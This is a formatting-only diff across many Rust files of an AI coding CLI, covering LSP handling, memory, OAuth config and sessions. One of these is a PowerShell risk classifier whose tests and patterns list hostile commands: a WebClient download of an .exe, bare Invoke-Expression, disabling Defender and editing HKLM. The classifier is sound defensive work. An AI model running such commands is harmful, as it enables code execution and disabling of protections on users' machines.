         let uri = path_to_uri(file_path);
         let server_name = self
             .server_name_for_file(file_path)
-            .ok_or_else(|| {
-                anyhow::anyhow!("No LSP server configured for '{}'", file_path)
-            })?
+            .ok_or_else(|| anyhow::anyhow!("No LSP server configured for '{}'", file_path))?
             .to_string();
         self.ensure_started(file_path, root_dir).await?;
         let client = self
@@ -1176,9 +1123,7 @@ impl LspManager {
         let uri = path_to_uri(file_path);
         let server_name = self
             .server_name_for_file(file_path)
-            .ok_or_else(|| {
-                anyhow::anyhow!("No LSP server configured for '{}'", file_path)
-            })?
+            .ok_or_else(|| anyhow::anyhow!("No LSP server configured for '{}'", file_path))?
             .to_string();
         self.ensure_started(file_path, root_dir).await?;
         let client = self
@@ -1445,11 +1390,26 @@ mod tests {
 
     #[test]
     fn test_severity_from_lsp_int() {
-        assert_eq!(DiagnosticSeverity::from_lsp_int(1), DiagnosticSeverity::Error);
-        assert_eq!(DiagnosticSeverity::from_lsp_int(2), DiagnosticSeverity::Warning);
-        assert_eq!(DiagnosticSeverity::from_lsp_int(3), DiagnosticSeverity::Information);
-        assert_eq!(DiagnosticSeverity::from_lsp_int(4), DiagnosticSeverity::Hint);
-        assert_eq!(DiagnosticSeverity::from_lsp_int(99), DiagnosticSeverity::Hint);
+        assert_eq!(
+            DiagnosticSeverity::from_lsp_int(1),
+            DiagnosticSeverity::Error
+        );
+        assert_eq!(
+            DiagnosticSeverity::from_lsp_int(2),
+            DiagnosticSeverity::Warning
+        );
+        assert_eq!(
+            DiagnosticSeverity::from_lsp_int(3),
+            DiagnosticSeverity::Information
+        );
+        assert_eq!(
+            DiagnosticSeverity::from_lsp_int(4),
+            DiagnosticSeverity::Hint
+        );
+        assert_eq!(
+            DiagnosticSeverity::from_lsp_int(99),
+            DiagnosticSeverity::Hint
+        );
     }
 
     #[test]

--- a/src-rust/crates/core/src/mcp_templates.rs
+++ b/src-rust/crates/core/src/mcp_templates.rs
@@ -58,10 +58,7 @@ impl TemplateRenderer {
                                 pos = start + replacement.len();
                             } else {
                                 // Variable not found, leave as-is and skip past it
-                                debug!(
-                                    "Template variable not found in context: {}",
-                                    var_name
-                                );
+                                debug!("Template variable not found in context: {}", var_name);
                                 pos = end + 2;
                             }
                         }
@@ -125,8 +122,7 @@ mod tests {
             "name": "Database",
             "description": "Query operations"
         });
-        let result =
-            TemplateRenderer::render("Use {{name}} for {{description}}", &context);
+        let result = TemplateRenderer::render("Use {{name}} for {{description}}", &context);
         assert_eq!(result, "Use Database for Query operations");
     }
 
@@ -138,10 +134,8 @@ mod tests {
                 "version": "1.0"
             }
         });
-        let result = TemplateRenderer::render(
-            "Created by {{meta.author}} (v{{meta.version}})",
-            &context,
-        );
+        let result =
+            TemplateRenderer::render("Created by {{meta.author}} (v{{meta.version}})", &context);
         assert_eq!(result, "Created by Alice (v1.0)");
     }
 
@@ -168,10 +162,7 @@ mod tests {
             "count": 42,
             "enabled": true
         });
-        let result = TemplateRenderer::render(
-            "Count: {{count}}, Enabled: {{enabled}}",
-            &context,
-        );
+        let result = TemplateRenderer::render("Count: {{count}}, Enabled: {{enabled}}", &context);
         assert_eq!(result, "Count: 42, Enabled: true");
     }
 

--- a/src-rust/crates/core/src/memdir.rs
+++ b/src-rust/crates/core/src/memdir.rs
@@ -7,9 +7,9 @@
 //!   - `memdir.ts`       → `build_memory_prompt_content`, `load_memory_index`, `ensure_memory_dir_exists`
 //!   - `paths.ts`        → `auto_memory_path`, `is_auto_memory_enabled`
 
+use serde::{Deserialize, Serialize};
 use std::path::{Path, PathBuf};
 use std::time::{SystemTime, UNIX_EPOCH};
-use serde::{Deserialize, Serialize};
 
 // ---------------------------------------------------------------------------
 // Memory type taxonomy
@@ -129,7 +129,10 @@ fn collect_md_files(base: &Path, current_dir: &Path, out: &mut Vec<MemoryFileMet
         if path.is_dir() {
             collect_md_files(base, &path, out);
         } else if path.extension().map(|e| e == "md").unwrap_or(false) {
-            let file_name = path.file_name().map(|n| n.to_string_lossy().into_owned()).unwrap_or_default();
+            let file_name = path
+                .file_name()
+                .map(|n| n.to_string_lossy().into_owned())
+                .unwrap_or_default();
             if file_name == "MEMORY.md" {
                 continue;
             }
@@ -385,7 +388,7 @@ pub fn is_auto_memory_enabled(settings_enabled: Option<bool>) -> bool {
         // Truthy values (non-empty, non-"0", non-"false") disable memory.
         match val.to_lowercase().as_str() {
             "" | "0" | "false" | "no" | "off" => return true, // defined-falsy → ON
-            _ => return false,                                  // truthy → OFF
+            _ => return false,                                // truthy → OFF
         }
     }
 
@@ -458,10 +461,7 @@ pub fn truncate_entrypoint_content(raw: &str) -> EntrypointTruncation {
             "{} bytes (limit: {}) — index entries are too long",
             byte_count, MAX_ENTRYPOINT_BYTES
         ),
-        _ => format!(
-            "{} lines and {} bytes",
-            line_count, byte_count
-        ),
+        _ => format!("{} lines and {} bytes", line_count, byte_count),
     };
 
     truncated.push_str(&format!(
@@ -569,7 +569,11 @@ pub fn find_relevant_memories_simple(
                 })
                 .sum();
 
-            if score > 0.0 { Some((score, meta)) } else { None }
+            if score > 0.0 {
+                Some((score, meta))
+            } else {
+                None
+            }
         })
         .collect();
 
@@ -687,7 +691,10 @@ mod tests {
 
     #[test]
     fn test_freshness_text_fresh() {
-        let now = SystemTime::now().duration_since(UNIX_EPOCH).unwrap().as_secs();
+        let now = SystemTime::now()
+            .duration_since(UNIX_EPOCH)
+            .unwrap()
+            .as_secs();
         assert!(memory_freshness_text(now).is_empty());
     }
 
@@ -707,7 +714,10 @@ mod tests {
 
     #[test]
     fn test_freshness_note_fresh_is_empty() {
-        let now = SystemTime::now().duration_since(UNIX_EPOCH).unwrap().as_secs();
+        let now = SystemTime::now()
+            .duration_since(UNIX_EPOCH)
+            .unwrap()
+            .as_secs();
         assert!(memory_freshness_note(now).is_empty());
     }
 
@@ -749,8 +759,14 @@ mod tests {
 
     #[test]
     fn test_sanitize_path_component() {
-        assert_eq!(sanitize_path_component("/home/user/project"), "_home_user_project");
-        assert_eq!(sanitize_path_component("normal-name_123"), "normal-name_123");
+        assert_eq!(
+            sanitize_path_component("/home/user/project"),
+            "_home_user_project"
+        );
+        assert_eq!(
+            sanitize_path_component("normal-name_123"),
+            "normal-name_123"
+        );
         assert_eq!(sanitize_path_component("C:\\Users\\foo"), "C__Users_foo");
     }
 

--- a/src-rust/crates/core/src/message_utils.rs
+++ b/src-rust/crates/core/src/message_utils.rs
@@ -16,7 +16,10 @@ pub fn estimate_tokens(text: &str) -> u64 {
 
 /// Estimate total tokens for a slice of messages.
 pub fn estimate_messages_tokens(messages: &[Message]) -> u64 {
-    messages.iter().map(|m| estimate_tokens(&get_message_text(m)) + 4).sum()
+    messages
+        .iter()
+        .map(|m| estimate_tokens(&get_message_text(m)) + 4)
+        .sum()
 }
 
 /// Context-window info for a model / token count pair.
@@ -30,19 +33,37 @@ pub struct ContextUsage {
 pub fn calculate_context_window_usage(messages: &[Message], model: &str) -> ContextUsage {
     let used = estimate_messages_tokens(messages);
     let total = context_window_for_model(model);
-    let pct = if total > 0 { (used as f64 / total as f64) * 100.0 } else { 0.0 };
+    let pct = if total > 0 {
+        (used as f64 / total as f64) * 100.0
+    } else {
+        0.0
+    };
     ContextUsage { used, total, pct }
 }
 
 /// Return the context window token limit for a known model.
 pub fn context_window_for_model(model: &str) -> u64 {
-    if model.contains("claude-3-5-haiku") { return 200_000; }
-    if model.contains("claude-3-5-sonnet") { return 200_000; }
-    if model.contains("claude-3-7-sonnet") { return 200_000; }
-    if model.contains("claude-sonnet-4") { return 200_000; }
-    if model.contains("claude-opus-4") { return 200_000; }
-    if model.contains("opus") { return 200_000; }
-    if model.contains("haiku") { return 200_000; }
+    if model.contains("claude-3-5-haiku") {
+        return 200_000;
+    }
+    if model.contains("claude-3-5-sonnet") {
+        return 200_000;
+    }
+    if model.contains("claude-3-7-sonnet") {
+        return 200_000;
+    }
+    if model.contains("claude-sonnet-4") {
+        return 200_000;
+    }
+    if model.contains("claude-opus-4") {
+        return 200_000;
+    }
+    if model.contains("opus") {
+        return 200_000;
+    }
+    if model.contains("haiku") {
+        return 200_000;
+    }
     200_000 // safe default
 }
 
@@ -70,9 +91,9 @@ pub fn get_message_text(msg: &Message) -> String {
 pub fn is_tool_use_message(msg: &Message) -> bool {
     msg.role == Role::Assistant
         && match &msg.content {
-            MessageContent::Blocks(blocks) => {
-                blocks.iter().any(|b| matches!(b, ContentBlock::ToolUse { .. }))
-            }
+            MessageContent::Blocks(blocks) => blocks
+                .iter()
+                .any(|b| matches!(b, ContentBlock::ToolUse { .. })),
             _ => false,
         }
 }
@@ -81,9 +102,9 @@ pub fn is_tool_use_message(msg: &Message) -> bool {
 pub fn is_tool_result_message(msg: &Message) -> bool {
     msg.role == Role::User
         && match &msg.content {
-            MessageContent::Blocks(blocks) => {
-                blocks.iter().any(|b| matches!(b, ContentBlock::ToolResult { .. }))
-            }
+            MessageContent::Blocks(blocks) => blocks
+                .iter()
+                .any(|b| matches!(b, ContentBlock::ToolResult { .. })),
             _ => false,
         }
 }
@@ -130,12 +151,15 @@ pub fn truncate_message_content(msg: &mut Message, max_chars: usize) {
 pub fn format_tool_result(result: &Value) -> String {
     match result {
         Value::String(s) => s.clone(),
-        Value::Array(arr) => {
-            arr.iter()
-                .filter_map(|v| v.get("text").and_then(|t| t.as_str()).map(|s| s.to_string()))
-                .collect::<Vec<_>>()
-                .join("\n")
-        }
+        Value::Array(arr) => arr
+            .iter()
+            .filter_map(|v| {
+                v.get("text")
+                    .and_then(|t| t.as_str())
+                    .map(|s| s.to_string())
+            })
+            .collect::<Vec<_>>()
+            .join("\n"),
         other => other.to_string(),
     }
 }
@@ -146,7 +170,12 @@ mod tests {
     use crate::types::{ContentBlock, Message, MessageContent, Role};
 
     fn user_msg(text: &str) -> Message {
-        Message { role: Role::User, content: MessageContent::Text(text.to_string()), uuid: None, cost: None }
+        Message {
+            role: Role::User,
+            content: MessageContent::Text(text.to_string()),
+            uuid: None,
+            cost: None,
+        }
     }
 
     #[test]
@@ -164,8 +193,12 @@ mod tests {
     #[test]
     fn merge_text_blocks() {
         let blocks = vec![
-            ContentBlock::Text { text: "a".to_string() },
-            ContentBlock::Text { text: "b".to_string() },
+            ContentBlock::Text {
+                text: "a".to_string(),
+            },
+            ContentBlock::Text {
+                text: "b".to_string(),
+            },
         ];
         let merged = merge_consecutive_text_blocks(blocks);
         assert_eq!(merged.len(), 1);

--- a/src-rust/crates/core/src/migrations.rs
+++ b/src-rust/crates/core/src/migrations.rs
@@ -20,10 +20,19 @@ pub type MigrationFn = fn(&mut Value) -> bool;
 /// All migrations in the order they must be applied.
 pub const MIGRATIONS: &[(&str, MigrationFn)] = &[
     ("migrate_fennec_to_opus", migrate_fennec_to_opus),
-    ("migrate_legacy_opus_to_current", migrate_legacy_opus_to_current),
+    (
+        "migrate_legacy_opus_to_current",
+        migrate_legacy_opus_to_current,
+    ),
     ("migrate_opus_to_opus_1m", migrate_opus_to_opus_1m),
-    ("migrate_sonnet_1m_to_sonnet_45", migrate_sonnet_1m_to_sonnet_45),
-    ("migrate_sonnet_45_to_sonnet_46", migrate_sonnet_45_to_sonnet_46),
+    (
+        "migrate_sonnet_1m_to_sonnet_45",
+        migrate_sonnet_1m_to_sonnet_45,
+    ),
+    (
+        "migrate_sonnet_45_to_sonnet_46",
+        migrate_sonnet_45_to_sonnet_46,
+    ),
     (
         "migrate_bypass_permissions_to_settings",
         migrate_bypass_permissions_to_settings,
@@ -32,7 +41,10 @@ pub const MIGRATIONS: &[(&str, MigrationFn)] = &[
         "migrate_repl_bridge_to_remote_control",
         migrate_repl_bridge_to_remote_control,
     ),
-    ("migrate_enable_all_mcp_servers", migrate_enable_all_mcp_servers),
+    (
+        "migrate_enable_all_mcp_servers",
+        migrate_enable_all_mcp_servers,
+    ),
     ("migrate_auto_updates", migrate_auto_updates),
     ("reset_auto_mode_opt_in", reset_auto_mode_opt_in),
     ("reset_pro_to_opus_default", reset_pro_to_opus_default),

--- a/src-rust/crates/core/src/oauth_config.rs
+++ b/src-rust/crates/core/src/oauth_config.rs
@@ -90,7 +90,8 @@ pub const PROD_OAUTH: OAuthConfig = OAuthConfig {
     token_url: "https://platform.claude.com/v1/oauth/token",
     api_key_url: "https://api.anthropic.com/api/oauth/claude_cli/create_api_key",
     roles_url: "https://api.anthropic.com/api/oauth/claude_cli/roles",
-    console_success_url: "https://platform.claude.com/buy_credits?returnUrl=/oauth/code/success%3Fapp%3Dclaude-code",
+    console_success_url:
+        "https://platform.claude.com/buy_credits?returnUrl=/oauth/code/success%3Fapp%3Dclaude-code",
     claudeai_success_url: "https://platform.claude.com/oauth/code/success?app=claude-code",
     manual_redirect_url: "https://platform.claude.com/oauth/code/callback",
     client_id: "9d1c250a-e61b-44d9-88ed-5944d1962f5e", // Anthropic's Claude Code — will not work for Claurst
@@ -121,8 +122,7 @@ pub const STAGING_OAUTH: OAuthConfig = OAuthConfig {
 };
 
 /// Client-ID Metadata Document URL for MCP OAuth (CIMD / SEP-991).
-pub const MCP_CLIENT_METADATA_URL: &str =
-    "https://claude.ai/oauth/claude-code-client-metadata";
+pub const MCP_CLIENT_METADATA_URL: &str = "https://claude.ai/oauth/claude-code-client-metadata";
 
 // ---------------------------------------------------------------------------
 // Config selection
@@ -314,7 +314,8 @@ fn codex_tokens_path() -> Option<std::path::PathBuf> {
 
 /// Save Codex OAuth tokens to ~/.claurst/codex_tokens.json
 pub fn save_codex_tokens(tokens: &CodexTokens) -> anyhow::Result<()> {
-    let path = codex_tokens_path().ok_or_else(|| anyhow::anyhow!("Could not determine home directory"))?;
+    let path =
+        codex_tokens_path().ok_or_else(|| anyhow::anyhow!("Could not determine home directory"))?;
     std::fs::create_dir_all(path.parent().unwrap())?;
     let json = serde_json::to_string(tokens)?;
     std::fs::write(&path, json)?;
@@ -333,7 +334,8 @@ pub fn get_codex_tokens() -> Option<CodexTokens> {
 
 /// Clear stored Codex tokens
 pub fn clear_codex_tokens() -> anyhow::Result<()> {
-    let path = codex_tokens_path().ok_or_else(|| anyhow::anyhow!("Could not determine home directory"))?;
+    let path =
+        codex_tokens_path().ok_or_else(|| anyhow::anyhow!("Could not determine home directory"))?;
     if path.exists() {
         std::fs::remove_file(&path)?;
     }
@@ -395,7 +397,11 @@ mod tests {
             "verifier too short: {} chars",
             verifier.len()
         );
-        assert!(verifier.len() <= 128, "verifier too long: {} chars", verifier.len());
+        assert!(
+            verifier.len() <= 128,
+            "verifier too long: {} chars",
+            verifier.len()
+        );
     }
 
     #[test]

--- a/src-rust/crates/core/src/output_styles.rs
+++ b/src-rust/crates/core/src/output_styles.rs
@@ -154,7 +154,11 @@ fn load_style_file(path: &Path) -> Option<OutputStyleDef> {
 
     let raw_label = lines.next().unwrap_or("").trim().to_string();
     let label = raw_label.trim_start_matches('#').trim().to_string();
-    let label = if label.is_empty() { stem.clone() } else { label };
+    let label = if label.is_empty() {
+        stem.clone()
+    } else {
+        label
+    };
 
     let description = lines
         .next()
@@ -197,8 +201,7 @@ pub fn find_style<'a>(styles: &'a [OutputStyleDef], name: &str) -> Option<&'a Ou
 // Runtime style registry (populated by plugins at startup)
 // ---------------------------------------------------------------------------
 
-static RUNTIME_STYLES: Lazy<Mutex<Vec<OutputStyleDef>>> =
-    Lazy::new(|| Mutex::new(Vec::new()));
+static RUNTIME_STYLES: Lazy<Mutex<Vec<OutputStyleDef>>> = Lazy::new(|| Mutex::new(Vec::new()));
 
 /// Register an `OutputStyleDef` at runtime (called from plugin loading code).
 ///
@@ -215,10 +218,7 @@ pub fn register_runtime_style(style: OutputStyleDef) {
 
 /// Return all runtime-registered styles.
 pub fn runtime_styles() -> Vec<OutputStyleDef> {
-    RUNTIME_STYLES
-        .lock()
-        .map(|g| g.clone())
-        .unwrap_or_default()
+    RUNTIME_STYLES.lock().map(|g| g.clone()).unwrap_or_default()
 }
 
 /// Like `all_styles`, but also includes runtime-registered plugin styles.
@@ -396,7 +396,8 @@ mod tests {
 
         // Write a user style file.
         let mut f = std::fs::File::create(output_styles_dir.join("pirate.md")).unwrap();
-        f.write_all(b"# Pirate\nSpeak like a pirate.\n\nArrr matey!").unwrap();
+        f.write_all(b"# Pirate\nSpeak like a pirate.\n\nArrr matey!")
+            .unwrap();
 
         let styles = all_styles(dir.path());
         assert!(styles.iter().any(|s| s.name == "pirate"));

--- a/src-rust/crates/core/src/prompt_history.rs
+++ b/src-rust/crates/core/src/prompt_history.rs
@@ -413,10 +413,7 @@ pub fn add_to_history(entry: HistoryEntry) {
 /// Read `~/.claurst/history.jsonl`, filter by `project`, and return up to
 /// `MAX_HISTORY_ITEMS` entries newest-first.  Entries belonging to
 /// `current_session_id` are yielded before other sessions' entries.
-pub async fn get_history(
-    project: &str,
-    current_session_id: Option<&str>,
-) -> Vec<HistoryEntry> {
+pub async fn get_history(project: &str, current_session_id: Option<&str>) -> Vec<HistoryEntry> {
     let path = history_path();
 
     let (pending, skipped) = {
@@ -426,11 +423,7 @@ pub async fn get_history(
 
     // Read lines from disk newest-first (reverse the file).
     let disk_lines: Vec<String> = match fs::read_to_string(&path).await {
-        Ok(content) => content
-            .lines()
-            .rev()
-            .map(|l| l.to_string())
-            .collect(),
+        Ok(content) => content.lines().rev().map(|l| l.to_string()).collect(),
         Err(e) if e.kind() == std::io::ErrorKind::NotFound => Vec::new(),
         Err(e) => {
             debug!("Failed to read history file: {}", e);
@@ -469,9 +462,7 @@ pub async fn get_history(
     let mut other_entries: Vec<&LogEntry> = Vec::new();
 
     for entry in all_entries.iter().filter(|e| e.project == project) {
-        if current_session_id.is_some()
-            && entry.session_id.as_deref() == current_session_id
-        {
+        if current_session_id.is_some() && entry.session_id.as_deref() == current_session_id {
             current_session_entries.push(entry);
         } else {
             other_entries.push(entry);
@@ -539,10 +530,7 @@ async fn resolve_stored(stored: &StoredPastedContent) -> Option<PastedContent> {
 ///
 /// Image references (`[Image #N]`) are left unchanged.  Replacements are
 /// applied in reverse-index order to keep earlier byte offsets valid.
-pub fn expand_pasted_text_refs(
-    input: &str,
-    contents: &HashMap<u32, PastedContent>,
-) -> String {
+pub fn expand_pasted_text_refs(input: &str, contents: &HashMap<u32, PastedContent>) -> String {
     let refs = parse_references_with_positions(input);
     let mut expanded = input.to_string();
 
@@ -579,11 +567,7 @@ fn parse_references_with_positions(input: &str) -> Vec<(u32, String, usize)> {
     //   [Pasted text #N +X lines]
     //   [...Truncated text #N]
     //   [Image #N]
-    let prefixes: &[&str] = &[
-        "[Pasted text #",
-        "[...Truncated text #",
-        "[Image #",
-    ];
+    let prefixes: &[&str] = &["[Pasted text #", "[...Truncated text #", "[Image #"];
 
     let mut results = Vec::new();
     let bytes = input.as_bytes();
@@ -633,9 +617,7 @@ fn parse_references_with_positions(input: &str) -> Vec<(u32, String, usize)> {
 
         // Optional ` +N lines` suffix.
         let after_suffix = if let Some(s) = after_id.strip_prefix(" +") {
-            let dn = s
-                .find(|c: char| !c.is_ascii_digit())
-                .unwrap_or(s.len());
+            let dn = s.find(|c: char| !c.is_ascii_digit()).unwrap_or(s.len());
             let rest2 = &s[dn..];
             rest2.strip_prefix(" lines").unwrap_or(after_id)
         } else {
@@ -646,10 +628,7 @@ fn parse_references_with_positions(input: &str) -> Vec<(u32, String, usize)> {
         let after_dots = after_suffix.trim_start_matches('.');
 
         if after_dots.starts_with(']') {
-            let consumed = prefix.len()
-                + digit_end
-                + (after_id.len() - after_dots.len())
-                + 1; // `]`
+            let consumed = prefix.len() + digit_end + (after_id.len() - after_dots.len()) + 1; // `]`
             let matched = input[i..i + consumed].to_string();
             results.push((id, matched, i));
             i += consumed;
@@ -798,8 +777,7 @@ mod tests {
                 filename: None,
             },
         );
-        let result =
-            expand_pasted_text_refs("X [Pasted text #1 +1 lines] Y", &contents);
+        let result = expand_pasted_text_refs("X [Pasted text #1 +1 lines] Y", &contents);
         assert_eq!(result, "X line1\nline2 Y");
     }
 
@@ -844,8 +822,7 @@ mod tests {
                 filename: None,
             },
         );
-        let result =
-            expand_pasted_text_refs("[Pasted text #1] and [Pasted text #2]", &contents);
+        let result = expand_pasted_text_refs("[Pasted text #1] and [Pasted text #2]", &contents);
         assert_eq!(result, "AAA and BBB");
     }
 

--- a/src-rust/crates/core/src/provider_id.rs
+++ b/src-rust/crates/core/src/provider_id.rs
@@ -5,8 +5,8 @@
 // name is expected (and vice-versa).
 
 use serde::{Deserialize, Serialize};
-use std::ops::Deref;
 use std::fmt;
+use std::ops::Deref;
 
 // ---------------------------------------------------------------------------
 // ProviderId

--- a/src-rust/crates/core/src/ps_classifier.rs
+++ b/src-rust/crates/core/src/ps_classifier.rs
@@ -132,9 +132,9 @@ fn is_force_stop_critical_service(lower: &str) -> bool {
     // Critical service names
     let critical_services = [
         "windefend",
-        "wscsvc",       // Security Center
-        "mpssvc",       // Windows Firewall
-        "wuauserv",     // Windows Update
+        "wscsvc",   // Security Center
+        "mpssvc",   // Windows Firewall
+        "wuauserv", // Windows Update
         "eventlog",
         "lsass",
         "svchost",
@@ -229,8 +229,7 @@ pub fn classify_ps_command(command: &str) -> PsRiskLevel {
     // Disable Windows Defender / AV features
     if icontains(&whole, "set-mppreference")
         || icontains(&whole, "disable-windowsoptionalfeature")
-        || (icontains(&whole, "set-service")
-            && icontains(&whole, "windefend"))
+        || (icontains(&whole, "set-service") && icontains(&whole, "windefend"))
     {
         return PsRiskLevel::High;
     }
@@ -241,8 +240,7 @@ pub fn classify_ps_command(command: &str) -> PsRiskLevel {
         || icontains(&whole, "remove-item")
         || icontains(&whole, "new-itemproperty")
         || icontains(&whole, "remove-itemproperty"))
-        && (icontains(&whole, "hklm:")
-            || icontains(&whole, "hkey_local_machine"))
+        && (icontains(&whole, "hklm:") || icontains(&whole, "hkey_local_machine"))
     {
         return PsRiskLevel::High;
     }
@@ -260,9 +258,7 @@ pub fn classify_ps_command(command: &str) -> PsRiskLevel {
     }
 
     // sc.exe delete — remove a Windows service
-    if (icontains(&whole, "sc.exe") || icontains(&whole, "sc "))
-        && icontains(&whole, "delete")
-    {
+    if (icontains(&whole, "sc.exe") || icontains(&whole, "sc ")) && icontains(&whole, "delete") {
         return PsRiskLevel::High;
     }
     // Remove-Service cmdlet (PS 6+)
@@ -411,10 +407,7 @@ mod tests {
     #[test]
     fn test_critical_bare_iex() {
         // Bare IEX without URL is still Critical (arbitrary code execution)
-        assert_eq!(
-            classify_ps_command("iex $code"),
-            PsRiskLevel::Critical
-        );
+        assert_eq!(classify_ps_command("iex $code"), PsRiskLevel::Critical);
         assert_eq!(
             classify_ps_command("Invoke-Expression $someVar"),
             PsRiskLevel::Critical
@@ -424,7 +417,9 @@ mod tests {
     #[test]
     fn test_critical_webclient() {
         assert_eq!(
-            classify_ps_command("[System.Net.WebClient]::new().DownloadFile('https://x.com', 'c:\\tmp\\x.exe')"),
+            classify_ps_command(
+                "[System.Net.WebClient]::new().DownloadFile('https://x.com', 'c:\\tmp\\x.exe')"
+            ),
             PsRiskLevel::Critical
         );
     }
@@ -472,7 +467,9 @@ mod tests {
     #[test]
     fn test_high_registry_hklm() {
         assert_eq!(
-            classify_ps_command("Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Test' -Name Val -Value 1"),
+            classify_ps_command(
+                "Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Test' -Name Val -Value 1"
+            ),
             PsRiskLevel::High
         );
         assert_eq!(
@@ -553,7 +550,10 @@ mod tests {
     fn test_low_safe_commands() {
         assert_eq!(classify_ps_command("Get-Process"), PsRiskLevel::Low);
         assert_eq!(classify_ps_command("Get-ChildItem C:\\"), PsRiskLevel::Low);
-        assert_eq!(classify_ps_command("Get-Content C:\\temp\\log.txt"), PsRiskLevel::Low);
+        assert_eq!(
+            classify_ps_command("Get-Content C:\\temp\\log.txt"),
+            PsRiskLevel::Low
+        );
         assert_eq!(classify_ps_command("Write-Host 'Hello'"), PsRiskLevel::Low);
         assert_eq!(classify_ps_command("Get-Date"), PsRiskLevel::Low);
         assert_eq!(classify_ps_command("$x = 1 + 2"), PsRiskLevel::Low);
@@ -589,7 +589,10 @@ Write-Host "Done"
 
     #[test]
     fn test_auto_approvable_accept_edits_low_only() {
-        assert!(ps_is_auto_approvable("Get-Process", &PermissionMode::AcceptEdits));
+        assert!(ps_is_auto_approvable(
+            "Get-Process",
+            &PermissionMode::AcceptEdits
+        ));
         assert!(!ps_is_auto_approvable(
             "Stop-Service -Name Spooler",
             &PermissionMode::AcceptEdits
@@ -602,6 +605,9 @@ Write-Host "Done"
 
     #[test]
     fn test_auto_approvable_default_denies_all() {
-        assert!(!ps_is_auto_approvable("Get-Process", &PermissionMode::Default));
+        assert!(!ps_is_auto_approvable(
+            "Get-Process",
+            &PermissionMode::Default
+        ));
     }
 }

--- a/src-rust/crates/core/src/remote_session.rs
+++ b/src-rust/crates/core/src/remote_session.rs
@@ -86,7 +86,10 @@ impl RemoteSessionManager {
     ) -> Result<(), String> {
         let client = reqwest::Client::new();
         let resp = client
-            .post(format!("{}/api/sessions/{}/messages", self.base_url, session_id))
+            .post(format!(
+                "{}/api/sessions/{}/messages",
+                self.base_url, session_id
+            ))
             .header("Authorization", format!("Bearer {}", self.access_token))
             .header("Content-Type", "application/json")
             .body(entry_json.to_string())
@@ -150,10 +153,7 @@ impl SessionsWebSocket {
 
     /// Connect to the sessions WebSocket, emit events, and reconnect on disconnect.
     /// Runs until the sender is dropped or the task is cancelled.
-    pub async fn connect(
-        &self,
-        event_tx: mpsc::Sender<SessionEvent>,
-    ) -> Result<(), String> {
+    pub async fn connect(&self, event_tx: mpsc::Sender<SessionEvent>) -> Result<(), String> {
         let mut backoff_secs: u64 = 1;
         loop {
             match self.run_once(&event_tx).await {
@@ -181,7 +181,10 @@ impl SessionsWebSocket {
             self.ws_url,
             urlencoding::encode(&self.access_token)
         );
-        let request = url.as_str().into_client_request().map_err(|e| e.to_string())?;
+        let request = url
+            .as_str()
+            .into_client_request()
+            .map_err(|e| e.to_string())?;
 
         let (ws_stream, _) = connect_async(request).await.map_err(|e| e.to_string())?;
         tracing::info!(url = %self.ws_url, "SessionsWebSocket: connected");

--- a/src-rust/crates/core/src/remote_settings.rs
+++ b/src-rust/crates/core/src/remote_settings.rs
@@ -145,14 +145,8 @@ impl RemoteSettingsManager {
         }
         if let Some(ref token) = self.config.oauth_token {
             if !token.is_empty() {
-                headers.insert(
-                    "Authorization".to_string(),
-                    format!("Bearer {}", token),
-                );
-                headers.insert(
-                    "anthropic-beta".to_string(),
-                    "oauth-2025-04-20".to_string(),
-                );
+                headers.insert("Authorization".to_string(), format!("Bearer {}", token));
+                headers.insert("anthropic-beta".to_string(), "oauth-2025-04-20".to_string());
                 return Some(headers);
             }
         }
@@ -229,15 +223,14 @@ impl RemoteSettingsManager {
 
         // Try to parse as the expected response shape, but be permissive —
         // accept raw settings object if the wrapper is missing.
-        let (settings, _checksum) = if let Ok(parsed) =
-            serde_json::from_value::<RemoteSettingsResponse>(body.clone())
-        {
-            (parsed.settings, parsed.checksum)
-        } else if body.is_object() {
-            (body, None)
-        } else {
-            anyhow::bail!("Remote settings: unexpected response shape");
-        };
+        let (settings, _checksum) =
+            if let Ok(parsed) = serde_json::from_value::<RemoteSettingsResponse>(body.clone()) {
+                (parsed.settings, parsed.checksum)
+            } else if body.is_object() {
+                (body, None)
+            } else {
+                anyhow::bail!("Remote settings: unexpected response shape");
+            };
 
         Ok(Some(settings))
     }
@@ -291,10 +284,7 @@ impl RemoteSettingsManager {
             .as_ref()
             .map(|s| compute_checksum_from_settings(s));
 
-        match self
-            .fetch_with_retry(cached_checksum.as_deref())
-            .await
-        {
+        match self.fetch_with_retry(cached_checksum.as_deref()).await {
             Ok(Some(new_settings)) => {
                 // Got fresh settings — persist and return.
                 let checksum = compute_checksum_from_settings(&new_settings);

--- a/src-rust/crates/core/src/session_share.rs
+++ b/src-rust/crates/core/src/session_share.rs
@@ -4,7 +4,7 @@
 // share endpoint, and `export_session_text` as a plain-text fallback
 // when no endpoint is configured.
 
-use serde::{Serialize, Deserialize};
+use serde::{Deserialize, Serialize};
 
 #[derive(Debug, Clone, Serialize, Deserialize)]
 pub struct ShareRequest {
@@ -66,10 +66,7 @@ pub async fn share_session(
 
 /// Generate a simple local Markdown export of the session (fallback when
 /// no share endpoint is configured).
-pub fn export_session_text(
-    messages: &[crate::types::Message],
-    title: Option<&str>,
-) -> String {
+pub fn export_session_text(messages: &[crate::types::Message], title: Option<&str>) -> String {
     let mut out = String::new();
 
     out.push_str("# Claurst Conversation Export\n\n");

--- a/src-rust/crates/core/src/session_storage.rs
+++ b/src-rust/crates/core/src/session_storage.rs
@@ -240,10 +240,7 @@ pub fn transcript_path(project_root: &Path, session_id: &str) -> PathBuf {
 ///   [`MAX_TRANSCRIPT_BYTES`] to avoid unbounded growth.
 /// * Uses `OpenOptions::append(true)` which results in an atomic positional
 ///   write on POSIX (O_APPEND) and a best-effort append on Windows.
-pub async fn write_transcript_entry(
-    path: &Path,
-    entry: &TranscriptEntry,
-) -> crate::Result<()> {
+pub async fn write_transcript_entry(path: &Path, entry: &TranscriptEntry) -> crate::Result<()> {
     // Guard: do not grow files beyond the cap.
     if let Ok(meta) = tokio::fs::metadata(path).await {
         if meta.len() >= MAX_TRANSCRIPT_BYTES {
@@ -299,8 +296,7 @@ pub async fn load_transcript(path: &Path) -> crate::Result<Vec<TranscriptEntry>>
     let raw = tokio::fs::read_to_string(path).await?;
 
     // First pass: collect tombstoned UUIDs.
-    let mut tombstoned: std::collections::HashSet<String> =
-        std::collections::HashSet::new();
+    let mut tombstoned: std::collections::HashSet<String> = std::collections::HashSet::new();
 
     for line in raw.lines() {
         let trimmed = line.trim();
